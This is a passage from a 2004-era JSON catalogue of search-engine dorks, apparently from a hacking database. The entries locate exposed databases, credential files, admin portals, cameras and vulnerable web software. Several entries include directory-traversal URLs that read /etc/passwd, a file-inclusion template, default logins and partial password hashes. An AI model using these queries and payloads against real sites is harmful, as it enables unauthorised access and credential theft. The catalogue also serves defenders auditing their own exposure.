is in the install documentation (quoting):-- start quote --2. Rename the data.mdb file to a different name. After renaming the data.mdb file, open constants.asp and change the tstDBConnectString constant to reflect the new name. -- end quote --This search finds sites running Toast Forum by using the LINK: operator. Trial and error is needed to find the database file from the results by changing the URL. Member data can be found in the table \"tstdb_Member\". It looks like this:\"ID\" \"FName\" \"LName\" \"Username\" \"Password\" \"Email\" \"HideEmail\" \"ICQ\" \"Homepage\" \"Signature\" \"IP\" \"Skin\" \"IncludeSignature\" \"NotifyDefault\" \"PostCount\" \"LastLoginDate\" \"LastPostDate\"Passwords are encrypted with the RC4 algoritm, so an attacker would find cracking them is (more) difficult (than usual).", "submited": "2004-09-06", "request": "link:http://www.toastforums.com/", "id": 459}, {"short description": "snitz! forums db path error", "long description": "snitz forums uses a microsoft access databases for storage and the default name is \"Snitz_forums_2000.mdb\". The installation recommends changing both the name and the path. If only one is changed this database error occurs.  An attacker may use this information as a hint to the location and the changed name for the database, thus rendering the forum vulnerable to hostile downloads.", "submited": "2004-09-07", "request": "databasetype. Code : 80004005. Error Description :", "id": 460}, {"short description": "\"Powered by Ikonboard 3.1.1\"", "long description": "IkonBoard (http://www.ikonboard.com/) is a comprehensive web bulletin board system, implemented as a Perl/CGI script.There is a flaw in the Perl code that cleans up user input before interpolating it into a string which gets passed to Perl's eval() function, allowing an attacker to evaluate arbitrary Perl and hence run arbitrary commands.More info at: http://www.securitytracker.com/alerts/2003/Apr/1006446.htmlThe bug was fixed in 3.1.2.", "submited": "2004-09-07", "request": "\"Powered by Ikonboard 3.1.1\"", "id": 461}, {"short description": "inurl:snitz_forums_2000.mdb", "long description": "The SnitzTM Forums 2000 Version 3.4.04 Installation Guide and Readme says:  \"it is strongly recommended that you change the default database name from snitz_forums_2000.mdb to a cryptic or not easy to guess name.\"Of course, we know readme's are for lamers.. right admins ?[murfie@forofo googledorks]$ mdb-export snitz_forums_2000.mdb FORUM_MEMBERSMEMBER_ID,M_STATUS,M_NAME,M_USERNAME,M_PASSWORD,M_EMAIL, [etc]1,1,\"adminadmin\",\"58180bb12beb55a4bffbxxde75cxxc53dcc8061c3cdee52e0ebdcd74049d374e\",\"yourmail@server.com\",\" \",\" \",\"\",\"\",1,1,1,3,\" \",\" \",\" \",\"20030918120147\",2,\"20030918120207\",\"20030918120224\",\"Forum Admin\",\"10.xx.xx.72\",0,0,1,\"000.000.000.000\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\" \",\" \",\"\",\"\",\" \",\"\",\"\",\"\",\"\",1(data xx'd at some points) The password hash value is a SHA256 encoded string (with no salting). Every attacker knows they can be broken with a dictionary attack using a very simpel perl or C program.http://murfnet.xs4all.nl/public/scripts/perl/desnitz.txt", "submited": "2004-09-07", "request": "inurl:snitz_forums_2000.mdb", "id": 462}, {"short description": "WebAPP directory traversal", "long description": "WebAPP is advertised as the internet's most feature rich, easy to run PERL based portal system. The WebAPP system has a serious reverse directory traversal vulnerabilityhttp:///cgi-bin/index.cgi?action=topics&amp;viewcat=../../../../../../../etc/passwd%00http:///cgi-bin/index.cgi?action=topics&amp;viewcat=../../db/members/admin.dat%00Detailed info : http://www.packetstormsecurity.com/0408-exploits/webapp.traversal.txtCredits goes to PhTeam for discovering this vulnerability.", "submited": "2004-09-07", "request": "inurl:/cgi-bin/index.cgi inurl:topics inurl:viewca", "id": 463}, {"short description": "filetype:rdp rdp", "long description": "These are Remote Desktop Connection (rdp) files. They contain the settings and sometimes the credentials to connect to another windows computer using the RDP protocols.", "submited": "2004-09-07", "request": "filetype:rdp rdp", "id": 464}, {"short description": "filetype:reg \"Terminal Server Client\"", "long description": "These are Microsoft Terminal Services connection settings registry files. They may sometimes contain encrypted passwords and IP addresses.", "submited": "2004-09-07", "request": "filetype:reg \"Terminal Server Client\"", "id": 465}, {"short description": "inurl:\"nph-proxy.cgi\" \"Start browsing through this CGI-based proxy\"", "long description": "Observing the web cracker in the wild, one feels like they are watching a bear. Like a bear stocks up on food and then hibernates, a web cracker must stock up on proxies, and then hack until they run out.Web crackers are a distinct breed, and many do not comfort well with the draconian measures that many other crackers take, such as port and service scanning, the modern web cracker finds such tactics much too intrusive. This leaves the web cracker with the only viable option to come in contact with a large number of proxies being to use public proxy lists. These are of course very slow, and very very unstable, and do not allow the cracker much time between his proxy runs.Luckily google gives them another option, if they are smart enough to find it.CGI-proxy ( http://www.jmarshall.com/tools/cgiproxy/ ) is a CGI-based proxy application. It runs on a web server, and acts as an http proxy, in CGI form. A prudent site owner would hide it behind .htaccess, as most do, but with a powerful tool like google, the inprudent few who leave it open can quickly be seperated from the wise masses.CGI-proxy's default page contains the text, as you can see in the demo on their site:\"Start browsing through this CGI-based proxy by entering a URL below. Only HTTP and FTP URLs are supported. Not all functions will work (e.g. some JavaScript), but most pages will be fine.\"The proxy as it resides on a server is most often called nph-proxy.cgi. A web cracker can now use google to enumerate his list of proxy servers, like so:inurl:\"nph-proxy.cgi\" \"Start browsing through this CGI-based proxy\"More results can be obtained by admitting the \"inurl:nph-proxy.cgi\" constraint, but much more trash is generated as well.", "submited": "2004-09-09", "request": "inurl:\"nph-proxy.cgi\" \"Start browsing through this CGI-based proxy\"", "id": 466}, {"short description": "intitle:\"Index of *\" inurl:\"my shared folder\" size modified", "long description": "These are index pages of \"My Shared Folder\". Sometimes they contain juicy stuff like mp3's or avi files. Who needs pay sites for music when you got Google ? :) Uhm, well except for the copyright issue.", "submited": "2004-09-10", "request": "intitle:\"Index of *\" inurl:\"my shared folder\" size modified", "id": 467}, {"short description": "E-market remote code execution", "long description": "E-market is commercial software made by a korean company(http://www.bbs2000.co.kr). A vulnerability in this software was reported to Bugtraq. The exploit is possible with the index.php script:http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]http://[TARGET]/becommunity/community/index.php?from_market=Y&amp;pageurl=[injection URL] For more information read this:http://echo.or.id/adv/adv06-y3dips-2004.txt Author: y3dipsDate: Sept, 7th 2004Location: Indonesian, Jakarta", "submited": "2004-09-10", "request": "inurl:\"/becommunity/community/index.php?pageurl=\"", "id": 468}, {"short description": "filetype:pot inurl:john.pot", "long description": "John the Ripper is a popular cracking program every hacker knows. It's results are stored in a file called john.pot.This search finds such results files, currently only one. Also No results for the distributed john version (djohn.pot) today :)PS: This was posted to the \"fun\" forum, so don't take this too seriously !", "submited": "2004-09-10", "request": "filetype:pot inurl:john.pot", "id": 469}, {"short description": "Gallery configuration setup files", "long description": "Gallery is a popular images package for websites. Unfortunately, with so many users, more bugs will be found and Google will find more installations. This search finds Gallery sites that seem to have left more or less dangerous files on their servers, like resetadmin.php and others.We call it Gallery in Setup mode :)", "submited": "2004-09-10", "request": "intitle:gallery inurl:setup \"Gallery configuration\"", "id": 470}, {"short description": "filetype:xls inurl:\"email.xls\"", "long description": "Our forum members never get tired of finding juicy MS office files. Here's one by urban that finds email addresses.", "submited": "2004-09-10", "request": "filetype:xls inurl:\"email.xls\"", "id": 471}, {"short description": "filetype:pdb pdb backup (Pilot | Pluckerdb)", "long description": "Hotsync database files can be found using \"All databases on a Palm device, including the ones you create using NS Basic/Palm, have the same format. Databases you create using NS Basic/Palm have the backup bit set by default, so they are copied to your \"x:\\palm\\{username}\\backup\"The forum members suggested adding Pilot and Pluckerdb (linux software for pda), so the results are more clean. (pdb files can be used for protein databases, which we don't want to see).Currently we don't know of a program to \"read\" these binary files.", "submited": "2004-09-10", "request": "filetype:pdb pdb backup (Pilot | Pluckerdb)", "id": 472}, {"short description": "filetype:pl \"Download: SuSE Linux Openexchange Server CA\"", "long description": "this search will get you on the web administration portal of linux open exchange servers.", "submited": "2004-09-10", "request": "filetype:pl \"Download: SuSE Linux Openexchange Server CA\"", "id": 473}, {"short description": "intitle:\"dreambox web\"", "long description": "this search will show web administration interfaces of linux dream boxes.The Dreambox is one of the popular 3rd generation boxes. Based on a powerful IBM PowerPC (not PC !) with an MPEG1/2 hardware decoder, this box is FULLY open, with an open source Linux operating system. The Dreambox not only offers high quality video and audio, but also has a variety of connections to the outside world: Ethernet, USB, PS2, Compact Flash and two Smartcard readers. The box can handle any dish configuration, an unlimited number of channels or satellites, has a very fast channel scan, allows for direct digital recording, etc.", "submited": "2004-09-10", "request": "intitle:\"dreambox web\"", "id": 474}, {"short description": "PHP-Nuke - create super user right now !", "long description": "PHP-Nuke is a popular web portal thingie. It has popped up in the Google dorks before. I think we let this one describe itself, quoting from a vulnerable page:\"Welcome to PHP-Nuke!Congratulations! You have now a web portal installed!. You can edit or change this message from the Administration page. For security reasons the best idea is to create the Super User right NOW by clicking HERE.\"", "submited": "2004-09-13", "request": "\"create the Super User\" \"now by clicking here\"", "id": 475}, {"short description": "filetype:asp DBQ=\" * Server.MapPath(\"*.mdb\")", "long description": "This search finds sites using Microsoft Access databases, by looking for the the database connection string. There are forums and tutorials in the results, but also the real databases. An attacker can use this to find the name and location of the database and download it for his viewing pleasure, which may lead to information leakage or worse.", "submited": "2004-09-18", "request": "filetype:asp DBQ=\" * Server.MapPath(\"*.mdb\")", "id": 476}, {"short description": "intitle:\"TUTOS Login\"", "long description": "TUTOS stands for \"The Ultimate Team Organization Software.\" This search finds the login portals to TUTOS.Adding scheme.php in the /php/ directory seems to allow cool things. There seems to be a foothold for SQL table structures and, upon errors, directory structure of the server. It is said that with the username linus and the password guest you can see what it looks like when your logged in. This is unconfirmed as of now.", "submited": "2004-09-18", "request": "intitle:\"TUTOS Login\"", "id": 477}, {"short description": "\"Login to Usermin\" inurl:20000", "long description": "Usermin is a web interface that can be used by any user on a Unix system to easily perform tasks like reading mail, setting up SSH or configuring mail forwarding. It can be thought of as a simplified version of Webmin designed for use by normal users rather than system administrators.", "submited": "2004-09-18", "request": "\"Login to Usermin\" inurl:20000", "id": 478}, {"short description": "filetype:lit lit (books|ebooks)", "long description": "Tired of websearching ? Want something to read ? You can find Ebooks (thousands of them) with this search..LIT files can be opened with Microsoft Reader (http://www.microsoft.com/reader/)", "submited": "2004-09-18", "request": "filetype:lit lit (books|ebooks)", "id": 479}, {"short description": "\"Powered *: newtelligence\" (\"dasBlog 1.6\"| \"dasBlog 1.5\"| \"dasBlog 1.4\"|\"dasBlog 1.3\")", "long description": "DasBlog is reportedly susceptible to an HTML injection vulnerability in its request log. This vulnerability is due to a failure of the application to properly sanitize user-supplied input data before using it in the generation of dynamic web pages. Versions 1.3 - 1.6 are reported to be vulnerable.More:http://www.securityfocus.com/bid/11086/discussion/", "submited": "2004-09-18", "request": "\"Powered *: newtelligence\" (\"dasBlog 1.6\"| \"dasBlog 1.5\"| \"dasBlog 1.4\"|\"dasBlog 1.3\")", "id": 480}, {"short description": "Lotus Domino address books", "long description": "This search will return any Lotus Domino address books which may be open to the public. This can contain a lot of detailed personal info you don't want to fall in the hands of your competitors or hackers. Most of them are password protected.", "submited": "2004-09-18", "request": "inurl:\"/names.nsf?OpenDatabase\"", "id": 481}, {"short description": "intitle:\"Login - powered by Easy File Sharing Web Server\"", "long description": "Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE,Netscape,Opera etc.)\". More information at: http://www.securityfocus.com/bid/11034/discussion/An attacker can reportedly bypass the authentication by entering the the name of the virtual folder directly.", "submited": "2004-09-18", "request": "intitle:\"Login - powered by Easy File Sharing Web", "id": 482}, {"short description": "intitle:\"Tomcat Server Administration\"", "long description": "This finds login portals for Apache Tomcat, an open source Java servlet container which can run as a standalone server or with an Apache web server.", "submited": "2004-09-18", "request": "intitle:\"Tomcat Server Administration\"", "id": 483}, {"short description": "ez Publish administration", "long description": "Thousands of enterprises, governmental offices, non-profit organizations, small and middle sized companies and educational institutions around the world trust eZ publish for running their web solutions.Vendor site: http://www.ez.no/Vulnerabilities: http://search.securityfocus.com/swsearch?query=ez+publish&amp;sbm=bid&amp;submit=Search%21&amp;metaname=alldoc&amp;sort=swishlastmodifiedDepending on the version two queries can usedAdmin intitle:\"eZ publish administration\"intitle:\"Login\" \"Welcome to eZ publish administration\"Crosssite Scriting, Information Disclosure, Pathdisclosure available on older versions", "submited": "2004-09-21", "request": "Admin intitle:\"eZ publish administration\"", "id": 484}, {"short description": "inurl:administrator \"welcome to mambo\"", "long description": "Mambo is a full-featured content management system that can be used for everything from simple websites to complex corporate applications. Continue reading for a detailed feature list.Vendor: http://www.mamboserver.com/Cross Site Scripting and SQL injection exist in some versions 4.5 current version is 4.5.1RC3 Vulnerabilities: http://search.securityfocus.com/swsearch?query=mambo+open+source&amp;sbm=bid&amp;submit=Search%21&amp;metaname=alldoc", "submited": "2004-09-21", "request": "inurl:administrator \"welcome to mambo\"", "id": 485}, {"short description": "\"Powered by DCP-Portal v5.5\"", "long description": "DCP-Portal is more a community system than a CMS - it nevertheless calls itsself CMS. They have never seen a real CMS. Version 5.5 is vulnerable sql injection.Vulnerabilities: http://search.securityfocus.com/swsearch?query=dcp-portal&amp;sbm=bid&amp;submit=Search%21&amp;metaname=alldoc", "submited": "2004-09-21", "request": "\"Powered by DCP-Portal v5.5\"", "id": 486}, {"short description": "inurl:\"typo3/index.php?u=\" -demo", "long description": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.Vendor: http://www.typo3.com/Vulns: http://search.securityfocus.com/swsearch?query=Typo3&amp;sbm=bid&amp;submit=Search%21&amp;metaname=alldoc", "submited": "2004-09-21", "request": "inurl:\"typo3/index.php?u=\" -demo", "id": 487}, {"short description": "intitle:index.of (inurl:fileadmin | intitle:fileadmin)", "long description": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.The fileadmin directory is the storage for all user data like website templates, graphics, documents and so on.  Normally no sensitive data will be stored here except the one made available in restricted areas.Unprotected fileadmin directories can be found by an attacker using this query.Vendor: http://www.typo3.com/", "submited": "2004-09-21", "request": "intitle:index.of (inurl:fileadmin | intitle:fileadmin)", "id": 488}, {"short description": "Quicksite demopages for Typo3", "long description": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.The quicksite package is a demosite for typo3. Quicksite or Testsite will install a complete website of a soccerclub using the following credentials:user:adminpassword:passwordIf you want to login, again append \"typo3\" to the website dir.Vendor: http://www.typo3.com/An attacker will consider this as yet another way to find Typo3 hosts for which security focus lists vulnerabilities.", "submited": "2004-09-21", "request": "\"FC Bigfeet\" -inurl:mail", "id": 489}, {"short description": "site:netcraft.com intitle:That.Site.Running Apache", "long description": "Netcraft reports a site's operating system, web server, and netblock owner together with, if available, a graphical view of the time since last reboot for each of the computers serving the site. So, Netcraft scans Web servers, Google scans Netcraft, and the hacker scans Google.This search is easily modified (replace \"apache\" for the other server software), thus adding yet another way to find the webserver software version info.", "submited": "2004-09-21", "request": "site:netcraft.com  intitle:That.Site.Running Apache", "id": 490}, {"short description": "ext:log \"Software: Microsoft Internet Information Services *.*\"", "long description": "Microsoft Internet Information Services (IIS) has log files that are normally not in the docroot, but then again, some people manage to share them. An attacker may use these to gather: loginnames (FTP service), pathinformation, databasenames, and stuff..Examples:12:09:37 194.236.57.10 [2501]USER micze 33112:09:38 194.236.57.10 [2501]PASS - 23008:30:38 194.236.57.10 [2416]DELE com-gb97.mdb2000-06-18 15:08:30 200.16.212.225 activeip\\carpinchos 4.22.121.13 80 POST /_vti_bin/_vti_aut/author.dll - 200 2958 551 120 MSFrontPage/4.0 -", "submited": "2004-09-21", "request": "ext:log \"Software: Microsoft Internet Information Services *.*\"", "id": 491}, {"short description": "filetype:cgi inurl:tseekdir.cgi", "long description": "The Turbo Seek search engine has a vulnerability. The removed user can look at the contents of files on target. A removed user can request an URL with name of a file, which follows NULL byte (%00) to force system to display the contents of a required file, for example:/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00/cgi-bin/tseekdir.cgi?id=799*location=/etc/passwd%00 More: http://www.securitytracker.com/alerts/2004/Sep/1011221.html", "submited": "2004-09-21", "request": "filetype:cgi inurl:tseekdir.cgi", "id": 492}, {"short description": "\"Powered by phpOpenTracker\" Statistics", "long description": "phpOpenTracker is a framework solution for the analysis of website traffic and visitor analysis. More info at the vendor site: http://www.phpopentracker.de/en/index.phpA prebuild sample report is shipped with PhpOpenTracker which is used by most sites. This report does not use all possibilities of the framework like user tracking.", "submited": "2004-09-21", "request": "\"Powered by phpOpenTracker\" Statistics", "id": 493}, {"short description": "filetype:vcs vcs", "long description": "Filext.com says: \"Various programs use the *.VCS extension; too many to list individually. Take clues from the location of the file as a possible pointer to exactly which program is producing the file. The file's date and time can also help if you know which programs you were running when the file was written.\"The most common use is the \"vCalendar File\", used by Outlook for example. It can also belong to a \"Palm vCal Desktop Application\". For those who prefer clean searches, try these variations (with less results):\"PRODID: PalmDesktop Generated\"filetype:vcs VCALENDAR filetype:vcs BEGIN:VCALENDAR", "submited": "2004-09-22", "request": "filetype:vcs vcs", "id": 494}, {"short description": "filetype:config config intext:appSettings \"User ID\"", "long description": "These files generally contain configuration information for a .Net Web Application. Things like connection strings to databases file directories and more. On a properly setup IIS these files are normally not served to the public.", "submited": "2004-09-16", "request": "filetype:config config intext:appSettings \"User ID\"", "id": 495}, {"short description": "inurl:\"/catalog.nsf\" intitle:catalog", "long description": "This will return servers which are running versions of Lotus Domino. The catalog.nsf is the servers DB catalog. It will list all the DB's on the server and sometimes some juicy info too.  An attacker can back the url down to the \"/catalog.nsf\" part if needed.", "submited": "2004-09-10", "request": "inurl:\"/catalog.nsf\" intitle:catalog", "id": 496}, {"short description": "filetype:pst inurl:\"outlook.pst\"", "long description": "All versions of the popular business groupware client called Outlook have the possibility to store email, calenders and more in a file for backup or migration purposes.An attacker may learn a great deal about the owner or the company by downloading these files and importing them in his own client for his viewing pleasure.", "submited": "2004-09-11", "request": "filetype:pst inurl:\"outlook.pst\"", "id": 497}, {"short description": "\"index of/\" \"ws_ftp.ini\" \"parent directory\"", "long description": "This search is a cleanup of a previous entry by J0hnny. It uses \"parent directory\" to avoid results other than directory listings.WS_FTP.ini is a configuration file for a popular win32 FTP client that stores usernames and weakly encoded passwords. There is another way to find this file, that was added by Xewan:filetype:ini ws_ftp pwdIn our experience it's good to try both methods, as the results will differ quite a bit.", "submited": "2004-09-17", "request": "\"index of/\" \"ws_ftp.ini\" \"parent directory\"", "id": 498}, {"short description": "filetype:php inurl:index.php inurl:\"module=subjects\" inurl:\"func=*\" (listpages| viewpage | listcat)", "long description": "Reportedly the PostNuke Modules Factory Subjects module is affected by a remote SQL injection vulnerability. http://securityfocus.com/bid/11148/discussion/", "submited": "2004-09-23", "request": "filetype:php inurl:index.php inurl:\"module=subjects\" inurl:\"func=*\" (listpages| viewpage | listcat)", "id": 499}, {"short description": "W-Nailer Upload Area", "long description": "What is W-Nailer?W-Nailer is a PHP script which can create galleries for you.It uses a graphical library (GD) which enables PHP to manipulate images, for instance resizing to create thumbnails.W-Nailer is highly configurable to meet your needs. Even better, the configuration is nearly completely webbased.So after you have uploaded your files, you will just need your browser!", "submited": "2005-01-13", "request": "uploadpics.php?did= -forum", "id": 500}, {"short description": "filetype:cgi inurl:pdesk.cgi", "long description": "PerlDesk is a web based help desk and email management application designed to streamline support requests, with built in tracking and response logging.http://www.securitytracker.com/alerts/2004/Sep/1011276.html", "submited": "2004-09-23", "request": "filetype:cgi inurl:pdesk.cgi", "id": 501}, {"short description": "ext:ldif ldif", "long description": "www.filext.com says LDIF = LDAP Data Interchange Format.LDAP is used for nearly everything in our days, so this file may include some juice info for attackers. They can add INTEXT:keyword to get more specific targets.", "submited": "2004-09-23", "request": "ext:ldif ldif", "id": 502}, {"short description": "inurl:mewebmail", "long description": "MailEnable Standard Edition provides robust SMTP and POP3 services for Windows NT/2000/XP/2003 systems. This version is free for both personal and commercial usage and does not have any time, user or mailbox restrictions.This search is a portal search. If finds the logins screens. If a vulnerability is found, this search becomes the target base for an attacker.", "submited": "2004-09-23", "request": "inurl:mewebmail", "id": 503}, {"short description": "\"Powered by IceWarp Software\" inurl:mail", "long description": "IceWarp Web Mail is reported prone to multiple input validation vulnerabilities. Few details regarding the specific vulnerabilities are known. These vulnerabilities are reported to affect all versions of IceWarp Web Mail prior to version 5.2.8.There are two ways to find installations of IceWarp:\"Powered by IceWarp Software\" inurl:mailintitle:\"IceWarp Web Mail\" inurl:\":32000/mail/\"http://www.securityfocus.com/bid/10920", "submited": "2004-09-23", "request": "\"Powered by IceWarp Software\" inurl:mail", "id": 504}, {"short description": "inurl:/_layouts/settings", "long description": "With the combined collaboration features of Windows SharePoint Services and SharePoint Portal Server 2003, users in an organization can create, manage, and build collaborative Web sites and make them available throughout the organization. More information is available at : http://www.microsoft.com/sharepoint/Loads of company info can be gained by an attacker when the URL's are unprotected. Furthermore unprotected sharepoint sites give full \"Edit, Add and Delete access\" to the information, which in case of malicious users may cause loss of important data.", "submited": "2004-09-23", "request": "inurl:/_layouts/settings", "id": 505}, {"short description": "intitle:\"MRTG/RRD\" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)", "long description": "The remote user can reportedly view the first string of any file on the system where script installed. This is a very old bug, but some sites never upgraded their MRTG installations.http://www.securitytracker.com/alerts/2002/Feb/1003426.htmlAn attacker will find it difficult to exploit this in any usefull way, but it does expose one line of text from a file, for example (using the file /etc/passwd) shows this:ERROR: CFG Error Unknown Option \"root:x:0:1:super-user:/\" on line 2 or above.", "submited": "2004-09-24", "request": "intitle:\"MRTG/RRD\" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)", "id": 506}, {"short description": "filetype:mdb wwforum", "long description": "Web Wiz Forums is a free ASP Bulletin Board software package. It uses a Microsoft Access database for storage. The installation instructions clearly indicate to change the default path and filename (admin/database/wwForum.mdb).vendor: http://www.webwizguide.info/web_wiz_forums/The forum database contains the members passwords, either encrypted or in plain text, depending on the version.Please note: this search is proof that results can stay in Google's index for a long time, even when they are not on the site any longer. Currently only 2 out of 9 are actually still downloadable by an attacker.", "submited": "2004-09-24", "request": "filetype:mdb wwforum", "id": 507}, {"short description": "\"Powered By Elite Forum Version *.*\"", "long description": "Elite forums is one of those Microsoft Access .mdb file based forums. This one is particularly dangerous, because the filename and path are hardcoded in the software. An attacker can modify index.php for ./data/users/userdb.dat, open the file and see something like this:42administrat4571XXX367b52XXXb33b6ce74df1e0170(data was xx'd)These are MD5 digests and can be brute forced (with enough time) or dictionary cracked by a malicious user, thus giving adminstrator access to the forum.", "submited": "2004-09-24", "request": "\"Powered By Elite Forum Version *.*\"", "id": 508}, {"short description": "intitle:\"microsoft certificate services\" inurl:certsrv", "long description": "Microsoft Certificate Services Authority (CA) software can be used to issue digital certificates. These are often used as \"proof\" that someone or something is what they claim they are. The Microsoft certificates are meant to be used with IIS for example with Outlook Web Access. The users of these certificates have to decide if they trust it or not. If they do, they can import a root certificate into their browsers (IE).Anyways, this search by JimmyNeutron uncovers a few of these certificate servers directly connected to the Internet. Which (in theory) means anyone could issue a certificate from these sites and abuse it to mislead websurfers in phishing scams and such.", "submited": "2004-09-24", "request": "intitle:\"microsoft certificate services\" inurl:certsrv", "id": 509}, {"short description": "intitle:\"webadmin - /*\" filetype:php directory filename permission", "long description": "Webadmin.php is a free simple Web-based file manager. This search finds sites that use this software. If left unprotected an attacker files can be modified or added on the server.More info and screenshot at: http://cker.name/webadmin/", "submited": "2004-09-24", "request": "intitle:\"webadmin - /*\" filetype:php directory filename permission", "id": 510}, {"short description": "intitle:AnswerBook2 inurl:ab2/ (inurl:8888 | inurl:8889)", "long description": "First of all this search indicates solaris machines and second the webservice is vulnerable to a format string attack.Sun's AnswerBook 2 utilizes a third-party web server daemon (dwhttpd) that suffers from a format string vulnerability. The vulnerability can be exploited to cause the web server process to execute arbitrary code. The web server runs as user and group 'daemon' who, under recent installations of Solaris, owns no critical fileshttp://www.securiteam.com/unixfocus/5SP081F80K.htm", "submited": "2004-09-26", "request": "intitle:AnswerBook2 inurl:ab2/ (inurl:8888 | inurl:8889)", "id": 511}, {"short description": "More Axis netcams !", "long description": "More Axis Netcams, this search combines the cams with the default title (Live View) and extends it by searching for the \"view/view.shtml\" URL identifier. Models found with this search are:AXIS 205 version 4.02AXIS 206M Network Camera version 4.10AXIS 206W Network Camera version 4.10AXIS 211 Network Camera version 4.02AXIS 241S Video Server version 4.02AXIS 241Q Video Server version 4.01Axis 2100 Network CameraAxis 2110 Network Camera 2.34Axis 2120 Network Camera 2.40AXIS 2130R PTZ Network Camera", "submited": "2004-09-29", "request": "intitle:\"Live View / - AXIS\" | inurl:view/view.sht", "id": 512}, {"short description": "intitle:\"The AXIS 200 Home Page\"", "long description": "The Axis 200 HOME pages reside within the AXIS 200 device and  hold information about the current software version, technical documentation, some howto's and the device settings.", "submited": "2004-09-29", "request": "intitle:\"The AXIS 200 Home Page\"", "id": 513}, {"short description": "(\"Fiery WebTools\" inurl:index2.html) | \"WebTools enable * * observe, *, * * * flow * print jobs\"", "long description": "Fiery WebTools offers many of the same capabilities of the Command WorkStation, via a Java-enabled Web browser. All job control options such as job merging, edition and previews, as well as information on the status of the jobs are accessible through Fiery WebTools.", "submited": "2004-09-29", "request": "(\"Fiery WebTools\" inurl:index2.html) | \"WebTools enable * * observe, *, * * * flow * print jobs\"", "id": 514}, {"short description": "Konica Network Printer Administration", "long description": "This finds Konica Network Printer Administration pages. There is one result at the time of writing.", "submited": "2004-09-29", "request": "intitle:\"network administration\" inurl:\"nic\"", "id": 515}, {"short description": "Aficio 1022", "long description": "The Ricoh Aficio 1022 is a digital multifunctional B&amp;W copier, easily upgraded to include network printing, network scanning, standard/LAN faxing and storage capabilities.", "submited": "2004-09-29", "request": "inurl:sts_index.cgi", "id": 516}, {"short description": "intitle:RICOH intitle:\"Network Administration\"", "long description": "Network Administration pages for several Ricoh Afficio printer models, for example the Aficio 1018D and RICOH LASER AP1600.", "submited": "2004-09-29", "request": "intitle:RICOH intitle:\"Network Administration\"", "id": 517}, {"short description": "intitle:\"lantronix web-manager\"", "long description": "The Lantronix web manager home pages show the print server configuration (Server Name, Boot Code Version, Firmware, Uptime, Hardware Address, IP Address and Subnet Mask). The other setting pages are password protected.", "submited": "2004-09-29", "request": "intitle:\"lantronix web-manager\"", "id": 518}, {"short description": "Canon ImageReady machines", "long description": "The \"large\" Canon ImageReady machines with model versions 3300, 5000 &amp; 60000.", "submited": "2004-09-29", "request": "intitle:\"remote ui:top page\"", "id": 519}, {"short description": "((inurl:ifgraph \"Page generated at\") OR (\"This page was built using ifgraph\"))", "long description": "ifGraph is a set of perl scripts that were created to fetch data from SNMP agents and feed a RRD file (Round Robin Database) so that graphics can be created later. The graphics and the databases are created using a tool called RRDTool.", "submited": "2004-09-29", "request": "((inurl:ifgraph \"Page generated at\") OR (\"This page was built using ifgraph\"))", "id": 520}, {"short description": "ext:cgi intext:\"nrg-\" \" This web page was created on \"", "long description": "NRG is a system for maintaining and visualizing network data and other resource utilization data. It automates the maintenance of RRDtool databases and graph web pages (that look like MRTG web pages.)", "submited": "2004-09-29", "request": "ext:cgi intext:\"nrg-\" \" This web page was created on \"", "id": 521}, {"short description": "+\":8080\" +\":3128\" +\":80\" filetype:txt", "long description": "With the string [+\":8080\" +\":3128\" +\":80\" filetype:txt] it is possible to find huge lists of proxies... So, I've written a simple shell script that checks these lists and filters out the not responding proxies. It also stores time response in another file, so you can choose only fast proxies. Furthermore it can control the zone of the proxy with a simple whois grep... The script proxytest.sh is on my website:http://rawlab.relay.homelinux.net/programmi/proxytest.sh", "submited": "2004-09-29", "request": "+\":8080\" +\":3128\" +\":80\" filetype:txt", "id": 522}, {"short description": "ReMOSitory module for Mambo", "long description": "It is reported that the ReMOSitory module for Mambo is prone to an SQL injection vulnerability. This issue is due to a failure of the module to properly validate user supplied URI input. Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.Full report: http://www.securityfocus.com/bid/11219Klouw suggests: inurl:index.php?option=com_remository&amp;Itemid= Renegade added : \".. to get an administrator login, change the url to http://www.example.com/administrator .. it will pop up an login box...", "submited": "2004-09-29", "request": "inurl:com_remository", "id": 523}, {"short description": "inurl:cgi.asx?StoreID", "long description": "BeyondTV is a web based software product which let you manage your TV station. All you need is to install a TV tuner card on your PC and Connect your TV source (i.e. television antenna) to your TV tuner card. With a installed BeyondTV version you can now administrate your TV with your browser even over the internet.", "submited": "2004-10-05", "request": "inurl:cgi.asx?StoreID", "id": 524}, {"short description": "inurl:hp/device/this.LCDispatcher", "long description": "This one gets you on the web interface of some more HP Printers.", "submited": "2004-10-05", "request": "inurl:hp/device/this.LCDispatcher", "id": 525}, {"short description": "intitle:\"WordPress &gt; * &gt; Login form\" inurl:\"wp-login.php\"", "long description": "WordPress is a semantic personal publishing platform.. it suffers from a possible XSS attacks.http://www.securityfocus.com/bid/11268/info/", "submited": "2004-10-05", "request": "intitle:\"WordPress &gt; * &gt; Login form\" inurl:\"wp-login.php\"", "id": 526}, {"short description": "intitle:webeye inurl:login.ml", "long description": "This one gets you on the webinterface of Webeye webcams.", "submited": "2004-10-05", "request": "intitle:webeye inurl:login.ml", "id": 527}, {"short description": "inurl:\"comment.php?serendipity\"", "long description": "serendipity is a weblog/blog system, implemented with PHP. It is standards compliant, feature rich and open source.For an attacker it is possible to inject SQL commands.http://www.securityfocus.com/bid/11269/discussion/", "submited": "2004-10-05", "request": "inurl:\"comment.php?serendipity\"", "id": 528}, {"short description": "\"Powered by AJ-Fork v.167\"", "long description": "AJ-Fork is, as the name implies - a fork. Based on the CuteNews 1.3.1 core, the aim of the project is to improve what can be improved, and extend what  can be extended without adding too much bloat (in fierce opposition to the mainstream blogging/light publishing tools of today). The project aims to  be backwards-compatible with CuteNews in what areas are 